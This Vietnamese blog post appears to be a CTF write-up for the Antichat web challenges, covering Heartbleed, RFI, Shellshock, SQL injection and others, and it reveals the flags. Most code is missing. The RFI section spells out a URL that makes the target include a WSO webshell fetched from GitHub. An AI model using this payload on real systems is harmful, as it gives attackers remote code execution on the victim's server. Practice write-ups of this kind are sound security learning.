Hôm nay ngồi buồn thử vào mấy trang ctf chơi thử xem sao qua một vòng google thì mình thấy thằng antichat của nga có cái ctf nên mình chơi thử xem sao: mình chơi mục web đầu tiên vì đó là thế mạnh của mình.

Link để các bạn chơi: https://ctf.antichat.com/challenges

Phá Đảo: Heartbleed

Đây là lỗ hổng liên quan tới ssl các bạn có thể đọc trên mạng đâu đó, mình đơn giản là set cho nó lên metasploit và nhận được kết quả sau vài lần chạy

mở msfconsole lên và gõ lệnh

sau đó set các thông số trong options của nó thành như hình bên dưới

Chú ý đoạn thông tin login trong kết quả trả về chúng ta tìm ra được pass để đăng nhập:

Sau đó các bạn đăng nhập thành công sẽ hiển thị flag cho các bạn:

Flag: y0U_8r3ak_My_H34r7

Tiếp Theo Là RFI

Tấn công vào http://rfi.ctf.antichat.com/

Vào trang thấy có chữ flag nhấn vào thì link dạng http://rfi.ctf.antichat.com/?page=flag

Giờ chúng ta thử đập nó chuyển thành

http://rfi.ctf.antichat.com/?page=flag.php

chúng ta nhận được 1 cảnh báo “Warning: include(flag.php.php)”

do đoạn code sau

nó tự thêm cho mình một đuôi php đằng sau giờ xử nó bằng cách chạy webshell

code: https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php

chúng ta bỏ đuôi .php đi thành link sau:

http://rfi.ctf.antichat.com/?page=https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso

và đây là những gì sau đó:

Vấn đề chúng ta cần đọc file flag.php thì mình dùng code sau”

kết qủa tìm được flag trong source

flag: 1_am_k1n6_0f_RF1

Chiến shellshock

shellshock là một kiểu kết nối backconnect sau khi ngâm cứu mình viết ra đoạn code sau

Payload:

trên client:

kết quả


Chiến RSA

Công cụ cho phép mình crack bài này ở đây các bạn có thể dùng nó

https://github.com/Ganapati/RsaCtfTool

Sau khi chạy decode mình nhận được flag

Chơi PyCry

Sau khi ngâm cứu file tải về lấy đoạn code sau và tiến hành giải mã

Kết quả: flag{annoying_challenge_amirite}

RDP crack:

https://github.com/ANSSI-FR/bmc-tools

Template Injection

Cái này khá khó và chuối mình đọc qua rất nhiều tài liệu để xem nó là gì các bạn có thể đọc ở đây:

https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/

https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html

thì mình đã mò được payload chạy nó

Chơi blindsql

đích của ta là: http://blindsql.ctf.antichat.com/

Vì đây là blind sql lên chúng ta sẽ tập trung vào dữ liệu post

Đối với các lỗi sql thì nhanh nhất bạn nên dùng sqlmap.

Flag: bl1nd_bu7_dan63r0u5

errorsqli:

thử đăng nhập với user 1′” thì thấy hiển thị lỗi như vậy lỗi nằm ở ô login

Tiếp tục đưa vào sqlmap thì chúng ta được:

Flag: d0nt_sh0w_y0ur_3rr0r5

Tạm thời hết phần một 🙂

Leave a Reply

avatar
  Subscribe  
Notify of